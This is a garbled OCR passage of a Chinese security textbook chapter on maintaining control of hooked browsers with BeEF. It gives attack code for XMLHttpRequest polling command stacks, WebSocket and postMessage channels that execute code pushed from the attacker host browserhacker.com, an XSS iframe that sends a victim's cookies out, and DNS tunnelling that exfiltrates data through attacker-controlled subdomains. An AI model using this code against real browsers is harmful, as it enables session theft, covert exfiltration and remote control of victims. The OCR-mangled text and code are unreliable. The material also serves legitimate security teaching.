和 侮 手机 ， 还 是 安 章 系统 ， 抑 或 Windows XP 中 的 I[E6， 都 支持 XMLHttpRequest 对 象 。 在 IE5、IE6 
等 老 版 本 的 IE 中 ， 需 要 将 Microsoft .XMLHTTP 作 为 ActiveX 对 象 初始 化 ， 而 从 IE7 开 始 ， 这 个 对 





象 就 原生 存在 了 。 

















基于 XMLHttpRedquest 对 象 的 通信 非常 简单 。 只 要 通过 这 个 对 象 不 断 创建 发 送 给 攻击 服务 器 
(在 这 里 比如 是 BeEF ) 的 异步 GET 请 求 即 可 。 这些 请 求 定 时 发 送 , 比如 使 用 set Interval (send- 


Requ 








est(),2000) Javascript 函 数 每 2 秒 发 送 一 次 。BeEF 服 务 器 通过 以 下 两 种 方式 响应 : 
口 以 空 响应 表示 没有 新 动作 ; 











O 以 Content-length 大 于 0 的 响应 告诉 被 控制 的 浏览 器 执行 新 命令 。 





如 图 3-1 所 示 ， 框 线 框 住 的 响应 大 小 为 365 字 节 ， 因 为 服务 器 给 客户 端 发 送 了 新 命令 。 











^ Clear Persist All HTML CSS JavaScript ETT) Images Plugins Media Fonts 


Net panel activatec. Any requests while the net panel is inactive are not shown. 
* GET dh?bhsHgObFFiEFuY 200 OK 192.168.0.2 
* GET dh?bh=HpObFFIEFUY 200 OK 192.168.0.2 
+ GET dh?bheHgObFFIEFuY 200 OK 192.168.0.2 
* GET dh?bh=HpObFFIEFUY 200 OK 192.168.0.2 
* GET dh?bh=HpDbFFIEFuy 200 OK 192.168.0.2 
* GET dh?bh=HpObFFIEFUY 200 OK 192.168.0.2 
* GET dh?bhs HgDbFFIEFuY 200 OK 192.168.0.2 
* GET hookjs?BEEFHOOK= 200 OK 192.168.0.2 
* GET dh?bh=HpObFFIEFUY 200 OK 192.168.0.2 
* GET hookjs?BEEFHOOK= 200 OK 192.168.0.2 
* GET hookjs?BEEFHOOK» 200 OK 192.168.0.2 
* GET dh?bhsHgDbFFIEFuY 200 OK 192.168.0.2 
* GET dh?bhsHgObFFIEFuY 200 OK 192.168.0.2 




















图 3-1 通过 Firefox 的 Firebug 插 件 观 察 到 的 XMLHttpRecduest 轮 询 细节 





新 的 逻辑 是 利用 JavaScript 闭 包 的 JavaScript 代 码 。 例 如 ,在 下 面 的 代码 示例 中 , exec wrapper 





就 是 一 个 闭 包 : 


var a = 123; 
function exec_wrapper () { 


var b = 789; 
function do_something() { 
a = 456; 
console.log(a); // 456 -> 函数 作用 域 
console.log(b); // 678 -> 函数 作用 域 
be 
return do_something; 


} 


console.log(a); // 123 -> 全 局 作用 域 
var wrapper = exec_wrapper(); 
wrapper (); 
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闭 包 ， 特 别 是 在 JavaScript 中 ， 是 一 种 特殊 对 象 ， 既 包含 函数 ， 又 包含 创建 函数 的 环境 。 
前 面 的 代码 中 , 最 有 意思 的 是 在 执行 完 exec_wrapper () 后 , 你 可 能 会 觉得 就 不 能 再 访问 交 量 
b 了 ， 特 别 是 它 还 是 在 被 sxec_wrapper1() 返 回 的 函数 go_something() 的 外 部 定义 的 。 但 结 
果 呢 ， 如 果 你 再 执行 wrapper()， 会 看 到 控制 台中 输出 了 456 和 789。 也 就 是 说 ,变量 b 仍 然 是 
可 以 访问 的 。 

这 是 因为 exec_wrapper 是 一 个 闭 包 ,而 作为 环境 的 一 部 分 ,任何 在 创建 时 声明 的 局 部 变 
量 都 包含 在 内 。 闭 包 同 样 适 合 模 拟 私 有 方法 ， 以 实现 数据 可 见 性 ， 因 为 JavaScript 原 生 并 不 提 
供 定义 私有 方法 的 语法 。 而 这 样 做 的 结果 ， 就 是 为 JavaScript 提 供 了 面向 对 象 编程 的 概念 。 








闭 包 非 常 适合 添加 动态 代码 ， 因 为 闭 包 中 的 私有 变量 (通过 var 声 明 ) 在 全 局 作用 域 中 是 不 
可 见 的 *。 使 用 闭 包 ， 可 以 将 环境 数据 与 操作 该 数据 的 函数 关联 起 来 。 

如 果 你 想 多 次 提交 前 面 的 代码 ,为 了 将 新 代码 “限制 ”在 它 自己 的 函数 中 ,将 其 逻辑 封装 到 
闭 包 中 是 必需 的 。 根 据 BeEF 的 分 类 方法 ， 后面 的 例子 将 称 其 为 命令 模块 ， 因 为 它们 是 浏览 器 要 
执行 的 新 命令 。 

扩展 闭 包 的 思想 ， 可 以 创建 一 个 包装 器 ， 把 命令 模块 添加 到 栈 中 。 每 次 轮 询 请 求 完 成 ， 
stack.pop () 会 确保 移 除 栈 中 最 后 一 个 元 素 ， 然 后 执行 它 。 下 面 的 代码 就 是 这 种 方法 的 示例 实 
现 。 为 简单 起 见 ， 这 里 没有 包含 lock 对 象 和 pol1 () K: 

pov 


*/ 


commands: new Array (), 


















































/** 
* 包含 器 。 将 命令 模块 添加 到 命令 栈 中 
Rif. 


execute: function(fn) { 
this.commands.push(fn); 


}, 


/** 

* 轮 询 。 如 果 响 应 不 等 于 0, 调用 execute_commands () 
*/ 

get commands: function() ( 

try { 


this.lock - true; 

// 轮 询 server_host 以 获得 新 命令 

poll(server_host, function(response) { 
if (response.body != null && response.body.length > 0) 
execute_commands () ; 

Fla 

} catch(e)t 

this.lock = false; 

return; 
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} 
this.lock = false; 
m 


/** 
* 如 果 有 的 话 ， 执 行 接收 到 的 新 命令 
execute_commands: function() { 
if(commands.length == 0) return; 
this.lock = true; 
while(commands.length > 0) { 
command = commands.pop(); 
try { 
command () ; 
} catch(e) { 
console.error(.message) ; 
} 
} 
this.lock = false; 


正如 你 所 见 ， 在 execute_commands () 函数 中 ， 如 果 命 令 栈 不 是 空 的 ， 则 每 一 项 都 会 被 弹 
出 并 执行 。 之 所 以 可 以 在 try 块 中 调用 commana () ， 是 因为 使 用 了 闭 包 ， 即 命令 模块 被 封装 在 了 
自己 的 匿名 函数 中 : 























execute(function() { 
var msg = "What is your password?"; 
prompt (msg) ; 


2); 

匿名 函数 是 指 在 运行 时 动态 声明 的 没有 名 字 的 函数 。 匿 名 函数 特别 适合 执行 小 块 代码 , 特别 
是 那些 只 会 执行 一 次 ,不 会 在 别处 被 调用 的 代码 。 在 注册 事件 处 理 器 的 时 候 ， 匿 名 函数 的 使 用 非 
常 频繁 ， 例 如 : 

aButton.addEventListener('click'!,function() {alert ('you clicked me');},false); 

在 前 面 的 命令 模块 进入 目标 浏览 器 的 DOM， 并 调用 execute () 后 ， 下 面 的 JavaScript 代 码 会 
成 为 命令 栈 中 新 的 一 层 : 






































function() { 
var msg = "What is your password?"; 
prompt (msg) ; 


} 

WA, 当 运 行 commands .pop () 并 执行 弹出 的 代码 时 , 就 会 出 现 一 个 prompt 对 话 框 , 显示 msg 
的 内 容 。 
看 一 看 示例 的 实现 代码 ， 可 以 清楚 地 看 到 commands 数 组 是 作为 一 个 栈 来 实现 的 。 栈 是 一 种 
后 进 先 出 ( LastIn First Out, LIFO ) 的 数据 结构 。 有 读者 可 能 奇怪 ， 为 什么 不 把 它 实 现 为 先进 先 
E (First In First Out, FIFO) 的 数据 结构 ? 问 得 好 ! 答案 是 取决 于 你 的 需要 。 如 果 想 让 命令 模块 
的 执行 彼此 关联 , 让 相 邻 的 模块 及 输入 相互 依赖 , 比如 后 一 个 模块 的 输入 依赖 前 一 个 模块 的 输出 ， 
那么 FIFO 的 数据 结构 可 能 更 合适 。 


mi 
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3.2.2 ”使 用 跨 域 资源 共享 


CORS 扩 展 了 一 下 SOP， 可 以 允许 Web 应 用 指定 不 同 的 来 源 读 取 HTTP 响 应 。 如 果 你 有 一 个 中 
心 攻 击 服 务 器 ， 想 让 它 与 访问 不 同 来 源 的 浏览 器 通信 ， 那 利用 CORS 正 合适 。 

BeEF 服 务 器 通过 包含 以 下 HTTP 响 应 首部 实现 了 这 一 点 ， 它 人 允许 来 自任 何 地 方 的 跨 域 POST 
和 GET 请 求 : 














Access-Control-Allow-Origin: * 
Access-Control-Allow-Methods: POST, GET 


在 使 用 xMLHttpRequest 对 象 发 送 跨 域 GET 请 求 时 ， 如果 目 标 来 源 返 回 了 前 面 的 首部 , 那么 
浏览 器 就 可 以 读 取 其 全 部 HTTP 响 应 。 如 果 没 有 包含 上 面 的 CORS 首 部 ，SOP 就 会 阻止 
XMLHttpRequest 对 象 完整 读 取 HTTP 响 应 。 

与 任何 规范 一 样 , CORS 也 有 其 实现 上 的 问题 。 比 如 IE 在 第 10 个 版 本 之 前 就 没有 完整 支持 它 ， 
而 Opera Mini 则 完全 不 支持 CORS。 正 的 第 8 个 和 第 9 个 版 本 通过 XpomainReauest 对 象 部 分 支持 
CORS， 但 在 使 用 中 存在 如 下 限制 : 

口 仅 完全 支持 HTTP 和 HTTPS ; 

a 不 允许 请 求 中 包含 自 定义 首部 ; 

口 请 求 的 Content-type 默 认为 text/plain， 而 且 不 能 覆盖 ; 

口 不 能 发 送 cookie 及 其 他 认证 请 求 首部 。 

使 用 CORS 作 为 通信 渠道 ， 是 维系 被 勾 连 浏 览 器 与 你 的 服务 器 持久 互动 的 有 效 途 径 。 但 有 时 
候 ， 你 可 能 想 使 用 更 快 的 渠道 ， 比 如 WebSocket 协 议 。 下 一 小 节 我 们 将 介绍 它 。 
























































3.2.3 ”使 用 WebSocket 通信 


WebSocket 协 议 是 一 种 非常 快 、 全 双 工 的 通信 渠道 。 这 个 技术 可 以 实现 紧凑 的 事件 驱动 的 操 
作 ， 而 不 需要 轮 询 服务 器 。 但 这 不 是 说 要 你 放弃 内 部 的 轮 询 机 制 ， 具 体 还 要 看 你 的 需求 和 通信 渠 
道 的 架构 。 或 许 保持 某 种 限度 的 轮 询 还 是 有 好 处 的 。 

目前 的 WebSocket API 是 对 Comet 等 AJAX 推 送 技术 的 替代 。Comet 需 要 额外 的 客户 端 库 ， 而 
WebSocket API 在 现代 浏览 器 中 则 完全 是 原生 的 。 如 图 3-2 所 示 ， 包 括 IE10 在 内 的 所 有 最 新 版 浏览 
器 都 原生 支持 WebSocket 协 议 。 唯 一 的 例外 是 Opera Mini 和 安 卓 原生 浏览 器 等 一 些 移动 浏览 器 。 

即使 有 些 浏 览 器 不 支持 ， 也 有 很 多 项 目 致 力 于 为 这 些 浏 览 器 添加 WebSocket 兼 容 的 功能 。 其 
中 一 个 比较 有 和 名 的 项 目 就 是 Socket.io6。Socket.io 在 客户 端 还 是 要 依赖 额外 的 JavaScript 库 , 但 为 了 
保证 可 靠 连 接 , 会 在 运行 时 选择 最 可 行 的 传输 方式 。Socket.io 会 选择 WebSocket 协 议 、Adobe Flash 
Socket、AJAX 长 轮 询 和 JSONP 轮 询 等 方式 。 
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图 3-2 ”常见 浏览 器 对 WebSocket 协 议 的 支持 


以 下 代码 展示 了 一 个 通过 Ruby Web 服 务 右 连接 勾 连 浏览 器 的 简单 例子 。 下 面 的 Ruby 
WebSocket 服 务 器 实现 基于 EM-WebSocket" 库 (或 叫 gem )。EM-WebSocket 是 一 个 异步 但 非常 快 的 
基于 EventMachine* 的 实现 。 


require 'em-websocket' 
EventMachine.run { 
EventMachine: :WebSocket.start ( 
:hast se "OO oO" y 
sport => 6666, 
:secure => false) do |ws| 
begin 
ws.onmessage do |msg| 
p "Received:" 
p "->#{msg}" 
ws.send("alert(1);") 
end 
rescue Exception -» e 
print error "WebSocket error: tte)" 
end 
end 


} 

这 段 代 码 将 在 6666 端 口 绑 定 WebSocket 服 务 器 ， 等 待 从 客户 端 发 来 的 消息 。 接 收 到 消息 后 ， 
会 向 客户 端 发 送 一 个 新 命令 。 这 段 代 码 与 前 面 展示 的 那个 xzMLHEEPReduest 的 例子 有 些 相 似 , 就 
是 匿名 函数 function() {alert(1) }。 为 简单 起 见 , 这 里 没有 像 以 前 一 样 用 execute O 和 闭 包 ， 
但 只 要 简单 修改 这 上段 代码 就 可 以 支持 。 

客户 端 代码 是 JavaScript 写 的 , 使 用 了 原生 的 WebSocket API。 在 WebSocket 信 道 打 开 后 ， 客 户 
端 会 向 服务 器 发 送 一 条 消息 ,请求 更 多 命令 。 服 务 器 响应 后 , 会 触发 onmessage 事 件 ,并 执行 服 
务 需 返回 的 数据 ， 创 建 一 个 新 的 Function 对 象 。WebSocket 信 道 的 数据 流 可 以 是 string、Blob 
或 ArrayBuffer, 这 里 传输 的 是 string, 意味 着 代码 需要 通过 new Function () 对 其 进行 求 值 。 
在 此 假设 攻击 服务 器 和 JavaScript 代 码 都 是 可 以 信任 的 , 因此 这 样 使 用 Function 比 使 用 eval 相 对 
安全 一 些 。 
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var socket = new WebSocket ("ws://browserhacker.com:6666/") ; 
socket.onopen = function() { 
console.log("Socket open."); 
Socket.send("Server, send me commands."); 
} 
socket.onmessage = function(msg) { 
f = new Function (msg.data); 
£(); 
console.log("Command received and executed."); 


} 
如 图 3-2 所 示 ， 并 非 所 有 浏览 器 都 原生 支持 WebSocket API。 假 设 默认 情况 下 使 用 XMLHEtp 
Request 对 象 作为 默认 信道 以 支持 更 多 浏览 器 ,但 要 尽 可 能 升级 到 使 用 WebSocket 协 议 。 首 先 ， 
需要 确定 浏览 器 是 否 支持 WebSocket 协 议 ， 即 对 浏 aT 能 力 检测 。6.1 节 还 将 详细 介绍 几 种 不 
同 的 检测 技术 。 下 面 的 代码 可 以 用 来 确定 浏览 器 是 否 支 持 WebSocket API 或 Mozilla 的 


MozWebSocket: 



































hasWebSocket: function() { 
return !!window.WebSocket || !!window.MozWebSocket; 
} 


如 果 返 回 tzue， 则 可 以 在 JavaScript 中 使 用 WebSocket 协 议 。MozWebSsocket 对 象 与 WebSocket 
对 象 类 似 ， 只 是 在 某 些 旧版 本 Firefox ( 版 本 6~10 ) 中 多 了 一 个 前 级 。 从 Firefox 11 开 始 ， 就 可 以 使 
用 标准 而 不 带 前 级 的 WepSocket 对 象 了 。 


3.2.4 ”使 用 消息 传递 通信 


有 1 章 说 过 ，windqow.postMessage() 也 是 一 种 遵循 SOP 但 又 能 实现 跨 域 通信 的 原生 方法 。 
这 种 方法 需要 设置 ， 首 先 必须 在 攻击 服务 器 上 托管 一 个 IFrame 的 内 容 , 在 下 面 的 例子 中 ， 攻 击 服 


务 器 是 browserhackercom : 











NU 

















<html> 
<body> 
<b>Embed me on a different origin</b> 
<div id="debug">Ready to receive data...</div> 
<script> 
window.addEventListener("message", receiveMessage, false); 
function doClick() { 
parent .postMessage("Message sent from " + location.host, 
"http: //browservictim.com") ; 
j 
var debug - document.getElementById("debug"); 
function receiveMessage(event) ( 


debug.innerHTML += "Data: " + event.data + "Mn Origin: " + 
event.origin; 
parent.postMessage("alert(1)", event.origin); 
j 
</script> 


</body> 
</html> 
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然后 ， 需 要 利用 目标 站 点 上 的 XSS 隐 患 ， 假 设 目标 站 点 为 browservictim.com。 先 行 注 入 的 代 
码 需要 JavaScript 逻 辑 及 IFrame。 创 建 的 IFrame 会 加 载 前 面 的 代码 片段 。 注 意 这 里 的 to_server 
IFramefllpost msg(). receiveMessage () PRA: 





<div id="debug"></div> 
<div ada" wis 
<input type="text" id="v" /> 
<input type-"button" value-"Send to server" onclick-"post msg();" /> 
«iframe id-"to server" 
Src-"http://browserhacker.com/postMessage server.html"»«/iframe» 
«/div» 
<script type="text/javascript"> 
window.addEventListener("message", receiveMessage, false); 


var infoBar = document.getElementById("debug"); 

function receiveMessage(event) { 
infoBar.innerHTML += event.origin + ": " + event.data + ""; 
new Function(event.data) (); 


} 


function post_msg(domain) { 
var to server = document.getElementById("to server"); 
to server.contentWindow.postMessage("" + 
eval(document.getElementById("v").value), 
"http://browserhacker.com"); 
} 


</script> 


在 图 3-3 中 ， 可 以 看 到 发 送 到 browserhacker.com 的 browservictim.com 域 的 cookie。 





攻击 者 的 IFrame 





受害 者 


postMessage_server.html - receiveMessage C paor Watch Stack Breakpoints 
window. addEventListener("message", receiveMessage, false); New watch expression 
* this Window postMessage server.html. 
Tevent message origin=http://victim.com, 
data=popunder=yes; popundr=yes; 
setover18=1 





> =- Console HTML CSS ~ DOM Net Cookies TEXT] 





function doClick() ( 
parent.postMessage("Message sent from ”+ location.host, "ht 


var debug = document.getElementById("debug"); 
function receiveMessage(event) ( 
d » 和 + event.data + "Wn Origin: " 

parent .postMessage(“alert(#)", event.origin); 

18 ) 

9 </script> E 

20 Š P 

21 </body> ‘http: //victim.com’ 

22 </html> Window postMessage client.html 
[2 m initMessageEvent 





内 和 瞬 框 架 中 攻击 代码 的 断 点 。 注 意 aata 变 量 内 容 
图 3-3 AHS pte ER BS Bs 
从 browserhacker.com 加 载 的 代码 接收 到 来 自 不 同 源 的 数据 后 , 会 以 另外 的 JavaScript 代 码 作 响 


应 ， 然 后 这 段 代码 会 在 browservictim.com 上， 通过 创建 新 Function 被 求 值 。 如 图 3-4 所 示 ， 前 面 
的 示例 代码 只 简单 地 发 送 了 一 个 alert (1)。 
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—_———————— ee a 
(a a] LS] (@ victim.com/postmessage/postMessage_client.html 


i al*.  postMessage client.html ~ ` re || Bhan A 
8 <input type-"button" value-"Send to server" onclick-"post msg(); T 


<iframe id-"to server" src-"http://attacker.com/postMessage serve: 
«/div» 
<script type="text/javascript"> 
window.addEventListener("message", receiveMessage, false); 





14 var infoBar = document.getElementById( "debug" ); 
15 function receiveMessage(event) { 














e 16 infoBar.innerHTML += event.origin + ": " + event.data + ""; 
17 eval(event.data) 
is) ) 
19 
20 function post msg(domain) ( 
21 var to server - document.getElementById("to server"); 
22 to server.contentWindow.postMessage("" + 
23 eval(docnment.aetElementRvTd("v"Y.value|. "httn://attacker.: | 





图 3-4 ”响应 被 求 值 ，JavaScript 被 执行 


使 用 window.postMessage() 可 以 在 不 同窗 口 间 通 信 ， 包 括 不 同 的 I[Frame、 弹 出 窗口 、 弹 
出 广告 ， 以 及 通常 的 标签 页 。 同 样 ， 不 同 的 浏览 器 会 有 一 些 不 同 的 问题 。 在 正 8 及 更 高 版 本 中 ， 
只 能 在 IFrame 间 使 用 window.postMessage ()， 不 能 与 其 他 标签 页 或 窗口 通信 。 图 3-5 展 示 了 各 
浏览 锅 对 postMessage () 的 支持 情况 。 





IOS Opera Android Bl 
Safari Mini Browser Bro' 


Firefox Opera 





图 3-5 ”常见 浏览 器 支持 window.postMessage() 的 情况 
IE8 到 IE10 只 部 分 支持 postMessage () ,但 完全 支持 WebSocket 协 议 *。 因 此 ， 在 勾 连 浏览 器 
不 是 IE 的 情况 下 ， 可 以 考虑 将 postMessage () 作 为 主要 通信 渠道 。 
3.2.5 使 用 DNS 隧道 通信 
前 面 讨论 的 所 有 通信 渠道 都 依赖 HTTP 协 议 。WebSocket 协 议 虽然 例外 , 但 其 初始 握手 仍然 依 





68 第 3 章 ”持续 控制 





赖 一 次 HTTP 请 求 ， 被 HTTP 服 务 器 作为 一 次 更 新 "请 求 来 解释 ， 比 如 : 


GET /ws HTTP/1.1 

Host: browserhacker.com 

Upgrade: websocket 

Connection: Upgrade 

Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ-- 
Origin: http://browservictim.com 
Sec-WebSocket-Version: 13 


这 样 倒 也 没什么 问题 , 除非 你 不 直接 勾 连 浏览 器 ， 比 如 躲 在 一 个 会 记录 一 切 并 且 可 能 会 检查 
内 容 的 HTTP 代理 后 面 。 这 时 候 ， 就 轮 到 基于 DNS 的 通信 渠道 了 ， 再 辅 以 其 他 躲避 检测 的 技术 。 
监控 DNS 请 求 的 安全 措施 不 多 ”， 而 且 其 有 效 性 经 常 也 要 打 个 问号 ， 因 为 大 多 数 现代 浏览 器 都 使 
用 DNS 预 取 技 术 。DNS 预 取 主 要 用 于 提升 用 户 体 验 ， 即 预先 加 载 将 来 可 能 用 到 的 资源 ， 从 而 提高 
响应 速度 。 

Kenton Born 在 BlackHat 2010 上 展示 了 一 项 利用 DNS 对 浏览 器 隐藏 通信 的 技术 ”。 该 技术 适用 
于 只 从 浏览 器 向 服务 器 单 向 提取 数据 的 情况 。 如 果 要 求 双 向 通信 ， 问 题 就 复杂 了 。 

你 可 以 创建 一 个 简单 的 基于 DNS 的 单 向 隐蔽 信道 , 把 请 求 发 送 到 设计 好 的 域 , 而 该 域 被 你 控 
制 的 DNS 服务 器 解析 。 可 以 利用 这 个 信道 向 客户 端 发 送 对 称 密 钥 , 以 加 密 客 户 端 与 服务 器 间 后 续 
HTTP 请 求 及 响应 的 数据 。 比 如 ， 要 使 用 这 种 方式 发 送 字 符 串 ABCDE， 可 以 在 对 其 编码 后 再 通过 
一 个 子 域 解析 请 求 来 发 送 。 如 果 你 的 DNS 服 务 器 能 够 解析 browserhacker.com， 那 么 只 要 发 送 一 个 
对 图 片 资源 的 请 求 就 可 以 把 数据 发 出 去 ， 比 如 <img src="_encodedData_.browserhacker. 
com">。 而 生成 _encodedData_ 的 JavaScript 函 数 可 以 这 样 写 : 


encode_data = function(str) { 
var result=""; 

for (i=O;i<str.length;++i) { 

result+=str.charCodeAt (i) 







































































. toString (16) .toUpperCase(); 
} 
return result; 


s 


var data - "data, to extrude from client to server"; 
var _encodedData_ = encodeURI(encode data(data)); 
console.log(. encodedData, ) ; 


之 所 以 要 使 用 以 上 代码 ， 是 因为 域名 中 只 允许 包含 数字 字母 及 连 字 符 (- ) 和 点 CL. 
encode_data() 执 行 的 结果 是 把 前 面 代码 示例 中 的 数据 编码 成 像 下 面 这 样 : 


646174615F746F5F657874727564655F66726 
F6D5F636C69656E745F746F5F736572766572 


还 有 一 个 限制 是 FQDN ( Fully Qualified Domain Name， 完 全 限定 域名 ) 不 能 超过 255 个 字符 ， 
包括 点 在 内 。 考 虑 到 这 一 点 ， 前 面 的 代码 可 以 再 改进 为 如 下 所 示 : 

var max_domain_length = 255; 

var max_segment_length = max_domain_length - 


"browserhacker.com".length; 
var dom = document.createElement('b'); 
















































































32 ”通信 技术 69 





// FOF A v DS] BIR 
String.prototype.chunk = function(n) { 

if (typeof n=='undefined') n=100; 

return this.match(RegExp('.{1,'+n+'}','g')); 
un 


// 发 送 DNS 请 求 
sendQuery = function(query) { 
var img new Image; 





img.src = "http://"+query; 
img.onload = function() { dom.removeChild(this); } 
img.onerror = function() { dom.removeChild(this); } 


dom. appendChild(img) ; 
p 


// 把 消息 切割 成 段 
segments = _encodedData_.chunk (max_segment_length) ; 
for (seq-1; seq<=segments.length; seq++) { 
// 发 送 段 
sendQuery (seq+"."+segments.length+"." + 
segments [seq-1]+".browserhacker.com") ; 


} 

根据 你 在 攻击 中 使 用 的 域名 的 长 度 及 前 面 说 到 的 FQDN 限 制 ， 前 面 的 代码 片段 可 以 把 编码 的 
数据 切 成 这 样 的 块 : 

.EA.A9.8F.EA.A9.8C.EA.A9.8D.EA.A9.8A.EA.A9.8B 

因为 要 发 送 的 数据 一 般 都 不 会 少 于 5 个 字符 ， 所 以 首先 是 分 块 。 然 后 对 于 每 个 块 ， 都 在 DOM 
中 追加 一 个 相应 的 IMG 元 素 。 之 所 以 使 用 图 片 标签 ， 是 因为 在 浏览 器 禁用 预 取 DNS 功 能 的 时 候 ， 
会 首先 解析 src 属 性 ， 产 生 DNS 查 询 。 而 取得 相应 图 片 的 HTTP 请 求 则 随后 才 会 发 送 。 还 要 注意 ， 
如 果 DNS 服 务 器 的 响应 是 Error ( 错误 ) Not Found (未 找到 )， 则 后 续 的 HTTP 请 求 就 不 会 被 发 
送 了 。 但 与 此 同时 , DNS 服 务 器 已 经 处 理 了 来 自 客户 端的 数据 。 因 此 这 是 一 种 实现 隐蔽 通信 的 有 
用 技术 。 

这 个 技术 非常 适用 于 客户 端 与 你 控制 的 DNS 服 务 器 通信 的 情况 , 但 怎么 实现 服务 器 与 客户 端 
通信 ， 从 服务 器 向 客户 端 发 送 数据 呢 ? 比较 难 ， 但 也 是 可 以 实现 的 。 

一 种 实现 双向 通信 的 方式 是 推断 DNS 查询 的 时 间 ， 即 解析 一 个 域名 要 花 多 长 时 间 。 比 如 ,可 
以 推断 在 1 秒 钟 之 内 解析 完成 ， 服 务 器 发 送 0， 而 在 1 秒 钟 以 上 解析 完成 ， 服 务 器 发 送 1。 这 样 浏览 
器 可 以 重新 基于 其 二 进 制 表示 来 构造 字符 串 ， 使 用 String.fromcharcoaqae 0 。 

更 快 的 方法 是 使 用 到 域 的 成 功 和 不 成 功 连接 , 表示 数据 的 每 一 位 , 也 就 是 一 个 域 映 射 为 数据 
中 的 一 位 。 这 些 解 析 错 误 可 以 通过 JavaScript 检 测 。 

在 如 图 3-6 所 示 的 例子 中 , 域 bit-00000002-0000003d.browserhackercom 根 据 是 否 解析 完成 (并 
返回 资源 )， 表 示 1 或 0。 

















































































































Last login: Fri Nov 15 11:40:28 on ttys@0e 
lon-sp-5dv7p:^ morru$ host bit-00000002-0000003e.browserhacker.com 


bit-—00000002-0000003e.browserhacker.com has address 74.125.237.136 
lon-sp-5dv7p:^ morru$ host bit-00000002-0000003d.browserhacker.com 
Host bit-00000002-0000003d.browserhacker.com notAfound: 3(NXDOMAIN) 
lon-sp-5dv7p:^ morru$ 1 





图 3-6 ”解析 域 


如 图 3-6 所 示 ， 查 询 了 两 个 域 ， 得 到 两 个 不 同 的 结果 。 为 了 让 大 家 看 到 差异 ， 图 中 的 箭头 指 
向 了 两 次 请 求 中 稍微 不 同 的 字符 。 两 个 请 求 ， 一 个 解析 成 功 ， 一 个 解析 失败 。 这 正 是 通过 DNS 
隧道 从 服务 器 向 客户 端 发 送 数据 、 检 测 位 状态 的 基础 。 在 这 个 例子 中 ， 当 位 状态 设置 为 true 的 
时 候 ， 返 回 了 卫 地 址 74.125.237.136。 其 中 的 原因 接 下 来 解释 ， 如 图 3-7 和 图 3-8 所 示 。 


浏览 器 请 求 图 片 资源 : 
http://bit-00000002-0000003e. browserhacker.com/favicon.ico 





























DNS 请 求 
CO 被 二 过 的 浏览 器 E (2) 攻击 者 的 DNS 
KE 服务 器 

10.0.0.100 
响应 HTTP 

HTTP 

MGR 

内 部 网 Web 服 务 
器 10.0.0.100 
导致 调用 on1oad 函 数 


图 3-7 返回 1 位 





图 3-7 显 示 了 通过 浏览 器 DNS 隧 道 返回 一 个 1 位 的 过 程 。 在 成 功 ( 跨 域 ) 加 载 图 片 之 后 ,会 调 
用 on1oagd 函 数 存储 1 状态 。 


浏览 器 请 求 图 片 资源 : 
http://bit-00000002-0000003d.browserhacker.com/favicon.ico 




















DNS 请 求 
CU ways = (2) 攻击 者 的 DNS 
服务 器 
未 找到 响应 


导致 调用 onerror 函 数 
图 3-8 返回 0 位 
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图 3-8 展 示 了 另 一 次 DNS 隧道 中 的 信息 传输 过 程 , 但 这 一 次 传输 的 是 一 个 0 位 。 图片 在 ( 跨 域 ) 
加 载 失 败 后 ， 会 调用 onerror 函 数 存 储 0 状 态 。 
这 个 二 进 制 传 输 过 程 可 以 通过 浏览 器 , 向 应 该 返回 1 状态 的 DNS 隧道 服务 器 发 送 消息 来 确认 。 
然后 ， 就 可 以 使 用 这 个 DNS 隧道 从 服务 器 向 浏 SRC To 
下 面 的 代码 片段 演示 了 从 DNS 隧道 接收 字符 串 的 过 程 。 注 意 ， 为 简单 起 见 ， 省 略 了 第 一 步 ， 
即 向 DNS 隧道 发 送 下 地 址 的 步骤。 这 里 硬 编码 了 74.125.237.136 为 DNS 隧道 服务 器 的 了 地址 。 


var tunnel_domain = "browserhacker.com"; // DNS 服务 器 的 位 置 








E 























var dom - document.createElement('b'); 
var messages - new Array(); 

var bits - new Array(); 

var bit transfered - new Array(); 

var timing - new Array(); 


// 通过 请 求 图 片 触发 DNS 查询 
send_query = function(fqdn, msg, byte, bit) { 
var img = new Image; 


img.src = "http://" + fqdn + "/favicon.ico"; 
img.onload = function() ( // 成 功 加 载 ， 因 而 位 等 于 1 
bits[msg] [bit] = 1; 


bit_transfered[msg] [byte]++; 

if (bit_transfered[msg] [byte] >= 8) 
reconstruct_byte(msg, byte); 

dom.removeChild(this) ; 


img.onerror = function() { // 加 载 失 败 ， 因 而 位 等 于 0 
bits [msg] [bit] = 0; 
bit_transfered[msg] [byte] ++; 
if (bit_transfered[msg] [byte] >= 8) 

reconstruct_byte(msg, byte); 
dom.removeChild(this) ; 

} 

dom. appendChild(img) ; 

un 


// 构建 请 求 并 通过 send_query 发 送 
function get_byte(msg, byte) { 
bit_transfered[msg] [byte] = 0 
// 每 次 请 求 字 节 中 的 一 位 
for(var bit=byte*8; bit < (byte*8)+8; bit++) { 
// 设置 消息 数 (十 六 进 制 ) 


msg str = ("00000000" + msg.toString(16)).substr(-8); 
// 设置 位 数 (十 六 进 制 ) 

bit str = ("00000000" + bit.toString(16)).substr(-8); 
// 构建 子 域 

subdomain = "bit-" + msg_str +"-" + bit_str; 

// 构建 完整 的 r 

domain = subdomain + '.' + tunnel_domain; 


// 请 求 类 似 如 此 的 域 
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// bit-00000002-0000003e.browserhacker.com 
send_query (domain, msg, byte, bit) 
} 
} 


// 构建 环境 并 请 求 消息 

function get_message(msg) { 
// 为 取得 消息 设置 变量 
messages[msg] = ""; 


bits[msg] = new Array(); 
bit_transfered[msg] = new Array(); 
timing[msg] = Date.now(); 


get_byte(msg, 0); 
j 


// 构建 二 进 制 结果 返回 的 数据 
function reconstruct_byte(msg, byte) { 
var char = 0; 
// 构建 请 求 的 最 后 字 节 
for (var bit=byte*8; bit < (byte*8)+8; bit++) { 
char <<= 1; 
char += bits[msg] [bit] ; 
} 


// 消息 以 空 字 节 结束 (失败 的 DNS 请 求 ) 
if (char != 0) { 
// 消息 没有 结束 ， 取 得 下 一 字 节 
messages[msg] += String.fromCharCode(char); 
get byte(msg, byte+l); 


) else { 

// 消息 结束 ， 完 成 

delta = (Date.now() - timing[msg])/1000; 

bytes per second = "" + 
((messages[msg].length + 1) * 8)/delta; 

console.log(messages[msg] + " - (" + 
(bytes_per_second.substr(0,5)) + 
" bits/second)"); 


} 


get_message(0); 

位 存储 在 bits 数 组 中 ， 还 有 与 请 求 对 应 的 位 数 。 把 位 存储 在 数组 中 ， 可 以 方便 将 来 在 
